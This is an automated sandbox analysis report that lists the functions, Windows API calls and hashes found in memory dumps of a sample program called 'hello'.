Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754

Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64

Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040ED05
_CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID:
API String ID: 3773818493-0
Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9

Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040E745
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4

Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A7E3

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A

Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59

Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94

Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54

Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406552

Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ErrorLast_beginthreadex
String ID:
API String ID: 4034172046-0
Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60

Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CC5E

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD

Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54

Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02

Function 0040D89F Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 938f96ef33963dfecdccb7339ec6814480dc8f914b3861dbfe03219cdb677223
Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
Opcode Fuzzy Hash: 938f96ef33963dfecdccb7339ec6814480dc8f914b3861dbfe03219cdb677223
Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A

Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F446

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59

Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299

Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698

Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509

Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09

Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F400

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction Fuzzy Hash:

Non-executed Functions

Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 004034E5
SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
_wtol.MSVCRT ref: 0040367F
CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6

Strings

.lnk, xrefs: 004036FF

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
